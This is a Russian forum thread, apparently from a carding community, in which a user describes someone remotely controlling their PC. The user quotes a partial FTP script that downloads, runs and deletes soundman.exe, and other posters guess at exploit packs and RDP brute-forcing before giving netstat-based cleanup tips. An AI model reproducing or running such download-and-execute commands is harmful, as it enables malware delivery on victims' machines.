такая вот хуйня

abckizaru

Professional
Messages
498
Reaction score
161
Points
43
Сидел вчера, не кого не трогал вбивал.
И тут давай браузер зум менять, и выдавать что то необычное.
Сижу смотрю что дальше, и тут давай в браузер писатся айпи и какие то команды, я быстрее закрыл.
Открыл блакнот с картоном, и туда кто то очень быстро начал писать вот это.
В самый конец как порядочно
ser 7778 25796 .. eq 7echo get soundman.exe .. eq 7echo quit .. eq 7ftp -n -s;eq 7soundman.exe 7del eq
Видно что не успели дописать, тот кто писал очень сильно торопился
Что это вообще за хуйня, отдел к?))
 
Точно сказать не могу, но возможен вариант, что ты попал на связку сплойтов которая пробивает процесс soundman.exe.
eq 7ftp -n -s;
Вот это похоже на то, что на компе поднимали ftp =\
 
спасибо плюсик поставил
да и в браузере что то писали типо такой команды
 
Возмужно у тебя открыт порт 3389
Возможно тебя сбрутили как дедик. :)
Точно не отдел к.
У них методы посложнее:)
 
сори что влез а какие у отдела к методы опишите вкраце чтоб понимать если не сложно
 
ректальная криптография, и задержания торговцев порнушкой контрафактной на митинке.
вот и все методы.

обычно все-таки обэпу сдают такую работу.

а про чудеса с компом - поздравляю, ты почти стал соксом)
но видимо лоадер скосячил где-то.
 
Last edited:
в такой ситуации сразу отрубаем инет, дальше не торопясь читаем и, если непонятно, гуглим - что там незваный гость писал. после этого, как правило, дальнейший план действий проще определить.
 
ну и проверь свой комп на предмет наличия всяких радминов, и внц)
 
нет такого нечего :)
он писал а я стирал то что он пишет :)
 
в середине очередного рабочего вечера пробей что-нибудь типа "netstat -a > c:\1.txt" и потом покури подумай, что лишнее открыто и через что тебя могли прослушать

---------- Сообщение добавлено в 02:58 ---------- Предыдущее сообщение размещено в 02:54 ----------

если найдешь трой то пробей с атрибутами -o -b -v, там уже найдешь того кто слушает.. пс: с этими атрибутами команда выполняется около минуты, так что не торопись закрывать командер
 
Last edited:
А как узнать что как? Файлик создало, но как узнать что там куда маячит или нет.
 
смотри какие порты открыты, открыты ли они в другое время, скажем после 10 минут запуска компа... что эти порты значат.. а с -обв ты узнаешь какой файл открыл этот порт... так например я вчера узнал что мой кип инфиум делает запросы к одному порносайту, кому интересно antares.relax.ru:5222 - болезнь всех кипов
 
Top